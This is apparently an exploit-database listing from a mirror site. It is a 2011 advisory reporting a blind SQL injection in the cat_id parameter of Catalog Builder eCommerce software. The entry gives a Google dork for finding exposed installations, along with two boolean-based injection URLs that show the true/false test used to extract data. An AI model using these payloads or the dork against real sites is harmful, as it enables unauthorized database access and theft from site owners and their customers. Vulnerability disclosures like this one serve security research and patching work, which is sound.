[] NeoSense
E X P L O I T S
title author type platform port cve id

Catalog Builder eCommerce Software - Blind SQL Injection

Author: takeshix
type: webapps
platform: php
port: 
date_added: 2011-06-16 
date_updated: 2011-06-16 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------

vulnerable url:

/catalog/main.php?cat_id=[blind sqli]

example:

http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false


--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.